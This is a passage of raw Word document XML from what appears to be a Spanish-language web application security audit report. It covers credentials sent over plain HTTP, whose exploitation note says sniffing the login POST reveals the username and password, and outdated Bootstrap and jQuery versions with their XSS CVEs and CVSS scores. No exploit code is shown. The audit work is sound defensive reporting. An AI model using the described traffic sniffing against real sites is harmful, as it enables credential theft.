          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017D">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">VCSS 3.0 Puntuación</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017E">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5.7 Media</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Impacto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000180">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Un atacante puede interceptar el tráfico y robar las credenciales</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000181">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Solución</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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83">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184">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Todos los datos sensibles deben transmitirse por Https en lugar de por Http.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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Explotación:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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712720"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4"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400040" cy="271272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Como se puede ver escuchando los paquetes que van a la página web consigo el usuario y la contraseña, mirando los paquetes enviados en el Post del Login.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wl3bguy50rfm" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_y6qr6p8odl5i" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Versión desactualizada Bootstrap-&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018D">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table4"/>
        <w:tblW w:w="724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4417"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2831"/>
            <w:gridCol w:w="4417"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018E">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018F">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1035, 937</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000190">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP 2013</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000191">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A9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000192">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP 2017</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000193">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A9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000194">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CAPEC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000195">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65</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000196">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ASVS 4.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000197">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1.14.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000198">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP TOP 10 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000199">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A06</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019A">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Impacto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019B">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Al tratarse de una versión antigua del software, puede ser vulnerable a ataques.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019C">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Solución</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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9E">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19F">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Actualice su instalación de Bootstrap a la última versión estable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A0">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerabilidades conocidas de esta versión</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A1">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Bootstrap Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerabilidad</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A2">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A3">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En Bootstrap anterior a 4.1.2, es posible XSS en el atributo collapse data-parent.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A4">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A5">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A6">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CVSS</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A7">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A8">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CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A9">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AA">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AB">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Referencias externas</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001AC">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CVE-2018-14040</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001AD">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AE">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AF">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B0">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B1">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Bootstrap Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerabilidad</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B2">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B3">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En Bootstrap anterior a 4.1.2, es posible XSS en la propiedad data-target de scrollspy.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B4">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B5">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B6">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CVSS</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B7">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B8">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CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B9">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BA">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BB">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Referencias externas</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001BC">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CVE-2018-14041</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001BD">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BE">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BF">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C0">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Bootstrap Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerabilidad</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C1">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C2">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En Bootstrap anterior a 4.1.2, es posible XSS en la propiedad data-container de tooltip.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C3">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C4">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C5">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CVSS</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C6">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C7">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CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C8">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C9">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CA">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Referencias externas</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CB">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CVE-2018-14042</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_l1vnkjfrm0ny" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Versión desactualizada JQUERY -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CD">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table5"/>
        <w:tblW w:w="724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4417"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2831"/>
            <w:gridCol w:w="4417"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CE">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CF">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1035, 937</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D0">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP 2013</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D1">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A9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D2">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP 2017</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D3">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A9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D4">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CAPEC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D5">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65</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D6">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ASVS 4.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D7">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1.14.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D8">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
